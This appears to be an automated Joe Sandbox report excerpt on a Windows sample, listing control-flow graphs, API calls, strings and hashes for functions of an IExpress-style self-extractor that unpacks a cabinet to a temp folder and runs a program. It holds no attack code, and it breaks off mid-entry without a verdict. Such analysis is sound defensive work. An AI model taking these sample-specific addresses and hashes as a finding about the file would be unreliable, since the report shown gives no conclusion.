                                                                                                                control_flow_graph 242 7ff6fd2168f0-7ff6fd216950 call 7ff6fd2151f8 LocalAlloc 245 7ff6fd216982-7ff6fd216996 call 7ff6fd2151f8 242->245 246 7ff6fd216952-7ff6fd216975 call 7ff6fd214f2c call 7ff6fd217958 242->246 251 7ff6fd216998-7ff6fd2169cf call 7ff6fd214f2c LocalFree 245->251 252 7ff6fd2169d1-7ff6fd216a16 lstrcmpA LocalFree 245->252 258 7ff6fd21697b-7ff6fd21697d 246->258 251->258 255 7ff6fd216a18-7ff6fd216a1a 252->255 256 7ff6fd216a63-7ff6fd216a69 252->256 262 7ff6fd216a27 255->262 263 7ff6fd216a1c-7ff6fd216a25 255->263 259 7ff6fd216a6f-7ff6fd216a75 256->259 260 7ff6fd216d40-7ff6fd216d64 call 7ff6fd217d28 256->260 264 7ff6fd216d66-7ff6fd216d92 call 7ff6fd2186f0 258->264 259->260 266 7ff6fd216a7b-7ff6fd216a9c GetTempPathA 259->266 260->264 267 7ff6fd216a2a-7ff6fd216a3a call 7ff6fd216710 262->267 263->262 263->267 270 7ff6fd216ad9-7ff6fd216ae5 266->270 271 7ff6fd216a9e-7ff6fd216aaa call 7ff6fd216710 266->271 278 7ff6fd216d3b-7ff6fd216d3e 267->278 279 7ff6fd216a40-7ff6fd216a5e call 7ff6fd214f2c 267->279 276 7ff6fd216ae8-7ff6fd216aeb 270->276 277 7ff6fd216aaf-7ff6fd216ab1 271->277 280 7ff6fd216af0-7ff6fd216afa 276->280 277->278 283 7ff6fd216ab7-7ff6fd216ac1 call 7ff6fd212490 277->283 278->264 279->258 281 7ff6fd216afc-7ff6fd216b01 280->281 282 7ff6fd216b0d-7ff6fd216b1f 280->282 281->282 286 7ff6fd216b03-7ff6fd216b0b 281->286 287 7ff6fd216d07-7ff6fd216d30 GetWindowsDirectoryA call 7ff6fd216f14 282->287 288 7ff6fd216b25-7ff6fd216b3b GetDriveTypeA 282->288 283->270 296 7ff6fd216ac3-7ff6fd216ad3 call 7ff6fd216710 283->296 286->280 286->282 287->258 301 7ff6fd216d36 287->301 290 7ff6fd216b3d-7ff6fd216b40 288->290 291 7ff6fd216b42-7ff6fd216b56 GetFileAttributesA 288->291 290->291 294 7ff6fd216b5c-7ff6fd216b5f 290->294 291->294 295 7ff6fd216be9-7ff6fd216bfc call 7ff6fd216f14 291->295 298 7ff6fd216bd9 294->298 299 7ff6fd216b61-7ff6fd216b6b 294->299 307 7ff6fd216bfe-7ff6fd216c0a call 7ff6fd212490 295->307 308 7ff6fd216c20-7ff6fd216c2c call 7ff6fd212490 295->308 296->270 296->278 304 7ff6fd216bdd-7ff6fd216be4 298->304 299->304 305 7ff6fd216b6d-7ff6fd216b7f 299->305 301->276 310 7ff6fd216cfe-7ff6fd216d01 304->310 305->304 309 7ff6fd216b81-7ff6fd216bad GetDiskFreeSpaceA 305->309 307->298 317 7ff6fd216c0c-7ff6fd216c1e call 7ff6fd216f14 307->317 318 7ff6fd216c2e-7ff6fd216c3d GetWindowsDirectoryA 308->318 319 7ff6fd216c42-7ff6fd216c6a call 7ff6fd217e08 GetFileAttributesA 308->319 309->298 313 7ff6fd216baf-7ff6fd216bd0 MulDiv 309->313 310->287 310->288 313->298 316 7ff6fd216bd2-7ff6fd216bd7 313->316 316->295 316->298 317->298 317->308 318->319 324 7ff6fd216c6c-7ff6fd216c7f CreateDirectoryA 319->324 325 7ff6fd216c81 319->325 326 7ff6fd216c84-7ff6fd216c86 324->326 325->326 327 7ff6fd216c88-7ff6fd216c97 326->327 328 7ff6fd216c99-7ff6fd216cba SetFileAttributesA 326->328 327->310 329 7ff6fd216cbd-7ff6fd216cc7 328->329 330 7ff6fd216cc9-7ff6fd216ccf 329->330 331 7ff6fd216cdb-7ff6fd216cf8 call 7ff6fd216710 329->331 330->331 332 7ff6fd216cd1-7ff6fd216cd9 330->332 331->278 335 7ff6fd216cfa 331->335 332->329 332->331 335->310
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                • API String ID: 3973824516-1216675450
                                                                                                                • Opcode ID: 2795f33d37122c8914f55bb84a2c421aa931674af6ba2d52a3768653f76fb3eb
                                                                                                                • Instruction ID: 88e94269af15a1ef467c579d22fe24511c0045b1ea398d1216960807da215f92
                                                                                                                • Opcode Fuzzy Hash: 2795f33d37122c8914f55bb84a2c421aa931674af6ba2d52a3768653f76fb3eb
                                                                                                                • Instruction Fuzzy Hash: 97D17F22A1868286EB109B2096502BEB7A1FB85745F54C135DB6EC76D4FF3EF905CBC0
                                                                                                                Function 00007FF6FD212EDC Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 336 7ff6fd212edc-7ff6fd212f75 call 7ff6fd218da9 memset * 2 call 7ff6fd2151f8 341 7ff6fd212f7b-7ff6fd212fbc CreateEventA SetEvent call 7ff6fd2151f8 336->341 342 7ff6fd2131cd 336->342 347 7ff6fd212feb-7ff6fd212ff3 341->347 348 7ff6fd212fbe-7ff6fd212fc8 341->348 344 7ff6fd2131d2-7ff6fd2131e1 call 7ff6fd214f2c 342->344 349 7ff6fd2131e6 344->349 351 7ff6fd212ffd-7ff6fd213018 call 7ff6fd2151f8 347->351 352 7ff6fd212ff5-7ff6fd212ff7 347->352 353 7ff6fd212fca-7ff6fd212fe6 call 7ff6fd214f2c 348->353 350 7ff6fd2131e8-7ff6fd21320b call 7ff6fd2186f0 349->350 363 7ff6fd213026-7ff6fd213044 CreateMutexA 351->363 364 7ff6fd21301a-7ff6fd213024 351->364 352->351 355 7ff6fd2130cb-7ff6fd2130db call 7ff6fd217320 352->355 353->349 365 7ff6fd2130ec-7ff6fd2130f3 355->365 366 7ff6fd2130dd-7ff6fd2130e7 355->366 363->355 367 7ff6fd21304a-7ff6fd21305b GetLastError 363->367 364->353 368 7ff6fd213106-7ff6fd213125 FindResourceExA 365->368 369 7ff6fd2130f5-7ff6fd213101 call 7ff6fd212034 365->369 366->344 367->355 370 7ff6fd21305d-7ff6fd213070 367->370 372 7ff6fd213127-7ff6fd213139 LoadResource 368->372 373 7ff6fd21313c-7ff6fd213143 368->373 369->349 374 7ff6fd21308a-7ff6fd2130a7 call 7ff6fd214f2c 370->374 375 7ff6fd213072-7ff6fd213088 call 7ff6fd214f2c 370->375 372->373 378 7ff6fd213151-7ff6fd213158 373->378 379 7ff6fd213145-7ff6fd21314c #17 373->379 374->355 386 7ff6fd2130a9-7ff6fd2130c6 CloseHandle 374->386 375->386 382 7ff6fd21315a-7ff6fd21315d 378->382 383 7ff6fd213162-7ff6fd21316c call 7ff6fd213d34 378->383 379->378 382->350 383->349 388 7ff6fd21316e-7ff6fd21317d 383->388 386->349 388->382 389 7ff6fd21317f-7ff6fd213189 388->389 389->382 390 7ff6fd21318b-7ff6fd213192 389->390 390->382 391 7ff6fd213194-7ff6fd21319b call 7ff6fd211258 390->391 391->382 394 7ff6fd21319d-7ff6fd2131c9 call 7ff6fd217d28 391->394 394->349 397 7ff6fd2131cb 394->397 397->382
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                • String ID: $124$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                • API String ID: 3100096412-1886169316
                                                                                                                • Opcode ID: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                                                • Instruction ID: f3c8f2700eb690b1bb6caf369d1914ffc3f71905f425aadc2952a657b0530b38
                                                                                                                • Opcode Fuzzy Hash: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                                                • Instruction Fuzzy Hash: 6C816A31A0C64386F721AB24AA803B966A1AF96755F50C035DB2DC26D1FF7FF505CAC0
                                                                                                                Function 00007FF6FD216F14 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 398 7ff6fd216f14-7ff6fd216f59 399 7ff6fd216f5b-7ff6fd216f5e 398->399 400 7ff6fd216f63-7ff6fd216f8c GetCurrentDirectoryA SetCurrentDirectoryA 398->400 401 7ff6fd217262-7ff6fd217291 call 7ff6fd2186f0 399->401 402 7ff6fd216fbb-7ff6fd216ff6 GetDiskFreeSpaceA 400->402 403 7ff6fd216f8e-7ff6fd216fb6 call 7ff6fd214f2c call 7ff6fd217958 400->403 404 7ff6fd2171da-7ff6fd21722f memset call 7ff6fd217958 GetLastError FormatMessageA 402->404 405 7ff6fd216ffc-7ff6fd217024 MulDiv 402->405 420 7ff6fd217260 403->420 417 7ff6fd217234-7ff6fd21725b call 7ff6fd214f2c SetCurrentDirectoryA 404->417 405->404 409 7ff6fd21702a-7ff6fd217060 GetVolumeInformationA 405->409 414 7ff6fd2170c1-7ff6fd2170e5 SetCurrentDirectoryA 409->414 415 7ff6fd217062-7ff6fd2170bc memset call 7ff6fd217958 GetLastError FormatMessageA 409->415 419 7ff6fd2170e9-7ff6fd2170f0 414->419 415->417 417->420 423 7ff6fd2170f2-7ff6fd2170f7 419->423 424 7ff6fd217103-7ff6fd217116 419->424 420->401 423->424 426 7ff6fd2170f9-7ff6fd217101 423->426 427 7ff6fd21711a-7ff6fd21711d 424->427 426->419 426->424 428 7ff6fd21711f-7ff6fd217128 427->428 429 7ff6fd217150-7ff6fd217157 427->429 428->427 432 7ff6fd21712a 428->432 430 7ff6fd217186-7ff6fd217197 429->430 431 7ff6fd217159-7ff6fd217161 429->431 435 7ff6fd21719a-7ff6fd2171a2 430->435 431->430 434 7ff6fd217163-7ff6fd217184 431->434 432->429 433 7ff6fd21712c-7ff6fd21714b call 7ff6fd214f2c 432->433 433->420 434->435 437 7ff6fd2171be-7ff6fd2171c1 435->437 438 7ff6fd2171a4-7ff6fd2171a8 435->438 441 7ff6fd2171c7-7ff6fd2171ca 437->441 442 7ff6fd2171c3-7ff6fd2171c5 437->442 440 7ff6fd2171aa 438->440 443 7ff6fd2171cc-7ff6fd2171d5 440->443 444 7ff6fd2171ac-7ff6fd2171b9 call 7ff6fd212520 440->444 441->440 442->440 443->401 444->401
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 1611563598-1955631000
                                                                                                                • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                                                • Instruction ID: 88eaae5adb4678dd5cc5d5e51703c460ce51a54a2f9023d3abdfb8be3547e5a7
                                                                                                                • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                                                • Instruction Fuzzy Hash: 7FA15F36A18742C6E7208F20E5406AABBA1FB89744F548135EB5DC3795FF7EE5058BC0
                                                                                                                Function 00007FF6FD215F80 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                                                • Instruction ID: b477bbfc3216b3a9b51b339d7d455606c40b207da19b6ef59697ee81a001ff2c
                                                                                                                • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                                                • Instruction Fuzzy Hash: 88510835A08A4286EB118B14EA543796AA0FF89749F94C135CA6EC27E5FF7EF044C7C0
                                                                                                                Function 00007FF6FD213214 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152libraryfileloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 501 7ff6fd213214-7ff6fd21323c 502 7ff6fd213269-7ff6fd213270 call 7ff6fd2161d4 501->502 503 7ff6fd21323e-7ff6fd213244 501->503 511 7ff6fd213276-7ff6fd21327d call 7ff6fd2168f0 502->511 512 7ff6fd213368 502->512 505 7ff6fd213246 call 7ff6fd216294 503->505 506 7ff6fd21325c-7ff6fd213263 call 7ff6fd214064 503->506 513 7ff6fd21324b-7ff6fd21324d 505->513 506->502 506->512 511->512 519 7ff6fd213283-7ff6fd2132c5 GetSystemDirectoryA call 7ff6fd217e08 LoadLibraryA 511->519 516 7ff6fd21336a-7ff6fd21338a call 7ff6fd2186f0 512->516 513->512 514 7ff6fd213253-7ff6fd21325a 513->514 514->502 514->506 523 7ff6fd2132c7-7ff6fd2132e0 GetProcAddress 519->523 524 7ff6fd2132fb-7ff6fd213310 FreeLibrary 519->524 523->524 527 7ff6fd2132e2-7ff6fd2132f5 DecryptFileA 523->527 525 7ff6fd213316-7ff6fd21331c 524->525 526 7ff6fd2133a5-7ff6fd2133ba SetCurrentDirectoryA 524->526 525->526 530 7ff6fd213322-7ff6fd21333d GetWindowsDirectoryA 525->530 528 7ff6fd2133bc-7ff6fd2133c1 526->528 529 7ff6fd2133c3-7ff6fd2133c9 526->529 527->524 531 7ff6fd213344-7ff6fd213362 call 7ff6fd214f2c call 7ff6fd217958 528->531 532 7ff6fd21345f-7ff6fd213467 529->532 533 7ff6fd2133cf-7ff6fd2133d6 529->533 534 7ff6fd21338c-7ff6fd21339c call 7ff6fd216f14 530->534 535 7ff6fd21333f 530->535 531->512 536 7ff6fd213469-7ff6fd21346b 532->536 537 7ff6fd21347b 532->537 538 7ff6fd2133db-7ff6fd2133e9 533->538 545 7ff6fd2133a1-7ff6fd2133a3 534->545 535->531 536->537 541 7ff6fd21346d-7ff6fd213474 call 7ff6fd2123c0 536->541 544 7ff6fd21347d-7ff6fd21348b 537->544 538->538 542 7ff6fd2133eb-7ff6fd2133f2 538->542 552 7ff6fd213479 541->552 547 7ff6fd21342d call 7ff6fd215f80 542->547 548 7ff6fd2133f4-7ff6fd2133fb 542->548 550 7ff6fd2134a8-7ff6fd2134af 544->550 551 7ff6fd21348d-7ff6fd213493 544->551 545->512 545->526 561 7ff6fd213432 547->561 548->547 553 7ff6fd2133fd-7ff6fd21342b call 7ff6fd217d28 548->553 557 7ff6fd2134ba-7ff6fd2134bf 550->557 558 7ff6fd2134b1-7ff6fd2134b3 550->558 551->550 556 7ff6fd213495 call 7ff6fd2141b4 551->556 552->544 565 7ff6fd213434 553->565 566 7ff6fd21349a-7ff6fd21349c 556->566 557->516 558->557 559 7ff6fd2134b5 call 7ff6fd214a54 558->559 559->557 561->565 567 7ff6fd213436-7ff6fd213440 565->567 568 7ff6fd213445-7ff6fd213453 call 7ff6fd217984 565->568 566->512 569 7ff6fd2134a2 566->569 567->512 568->512 572 7ff6fd213459 568->572 569->550 572->532
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                • API String ID: 3010855178-3095882572
                                                                                                                • Opcode ID: 3b920b10fcc1ab7df9fbf93181fb0f5156642c947c696f5af8ccee6cfbca0bf9
                                                                                                                • Instruction ID: bb8705a032b9e86d520701362191582eb6cf93fe5e4c184156b8e122c40aa03c
                                                                                                                • Opcode Fuzzy Hash: 3b920b10fcc1ab7df9fbf93181fb0f5156642c947c696f5af8ccee6cfbca0bf9
                                                                                                                • Instruction Fuzzy Hash: BB713871E0C64386FB61AB15AB802B96AA1BF85740F50C035DB7DC22E1FF2EF84586C0
                                                                                                                Function 00007FF6FD216710 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 573 7ff6fd216710-7ff6fd21673c 574 7ff6fd21680b-7ff6fd21681a 573->574 575 7ff6fd216742-7ff6fd216747 call 7ff6fd2165a8 573->575 577 7ff6fd21681d-7ff6fd216827 574->577 578 7ff6fd21674c-7ff6fd21674e 575->578 579 7ff6fd216829-7ff6fd21682f 577->579 580 7ff6fd21683c-7ff6fd216847 577->580 583 7ff6fd2168c0 578->583 584 7ff6fd216754-7ff6fd21676a 578->584 579->580 581 7ff6fd216831-7ff6fd21683a 579->581 582 7ff6fd21684a-7ff6fd216854 call 7ff6fd216d9c 580->582 581->577 581->580 595 7ff6fd216856-7ff6fd216869 CreateDirectoryA 582->595 596 7ff6fd216875-7ff6fd21687d call 7ff6fd216f14 582->596 585 7ff6fd2168c2-7ff6fd2168e6 call 7ff6fd2186f0 583->585 587 7ff6fd21676d-7ff6fd216777 584->587 590 7ff6fd216779-7ff6fd21677f 587->590 591 7ff6fd21678c-7ff6fd2167a1 587->591 590->591 597 7ff6fd216781-7ff6fd21678a 590->597 592 7ff6fd2167f8-7ff6fd216809 call 7ff6fd217e08 591->592 593 7ff6fd2167a3-7ff6fd2167bb GetSystemInfo 591->593 592->582 598 7ff6fd2167e7 593->598 599 7ff6fd2167bd-7ff6fd2167c0 593->599 600 7ff6fd21686b 595->600 601 7ff6fd216894-7ff6fd21689f call 7ff6fd217958 595->601 607 7ff6fd216882-7ff6fd216884 596->607 597->587 597->591 606 7ff6fd2167ee-7ff6fd2167f3 call 7ff6fd217e08 598->606 604 7ff6fd2167de-7ff6fd2167e5 599->604 605 7ff6fd2167c2-7ff6fd2167c5 599->605 600->596 601->583 604->606 610 7ff6fd2167c7-7ff6fd2167ca 605->610 611 7ff6fd2167d5-7ff6fd2167dc 605->611 606->592 613 7ff6fd216886-7ff6fd216892 607->613 614 7ff6fd2168a1-7ff6fd2168a8 607->614 610->592 616 7ff6fd2167cc-7ff6fd2167d3 610->616 611->606 613->585 614->583 617 7ff6fd2168aa-7ff6fd2168bb RemoveDirectoryA 614->617 616->606 617->583
                                                                                                                APIs
                                                                                                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD21685B
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6FD212E07), ref: 00007FF6FD216643
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: GetFileAttributesA.KERNELBASE ref: 00007FF6FD216652
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: GetTempFileNameA.KERNEL32 ref: 00007FF6FD21667F
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: DeleteFileA.KERNEL32 ref: 00007FF6FD216697
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: CreateDirectoryA.KERNEL32 ref: 00007FF6FD2166A8
                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD2167A8
                                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD2168B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                • API String ID: 1979080616-3881341942
                                                                                                                • Opcode ID: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                • Instruction ID: 45c7f0575d192ebc61e390072bf037af6212399f8316666a7007c7531f5bfe04
                                                                                                                • Opcode Fuzzy Hash: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                • Instruction Fuzzy Hash: 53515821A0C68285FB118B25AA103B967A4BF85781F99C135CB6DC26D1FF7FF409C2C0
                                                                                                                Function 00007FF6FD214838 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119processsynchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 976364251-3916222277
                                                                                                                • Opcode ID: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                                                • Instruction ID: 08fd24f9cf44ca3329b9772fe4aac3bef2a281e9fd85b7686f6890e0e4476c5f
                                                                                                                • Opcode Fuzzy Hash: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                                                • Instruction Fuzzy Hash: 94515E3290CA8286E7608B10E654379B7A0FB88759F108135EB6DC26D4FF7DF4458BC0
                                                                                                                Function 00007FF6FD212D70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 85libraryloadershutdownCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                • API String ID: 1302179841-1204263913
                                                                                                                • Opcode ID: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                                                • Instruction ID: 82d45d8334abff585ffc79961198b7d42e3185ca3cb8ef9bbc4d26a1d54a9bd5
                                                                                                                • Opcode Fuzzy Hash: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                                                • Instruction Fuzzy Hash: 8B413A35E0864286FB649B61A6422B966A0BF49B44F54C035EB3DC22D5FF7FF445C6C0
                                                                                                                Function 00007FF6FD212034 Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
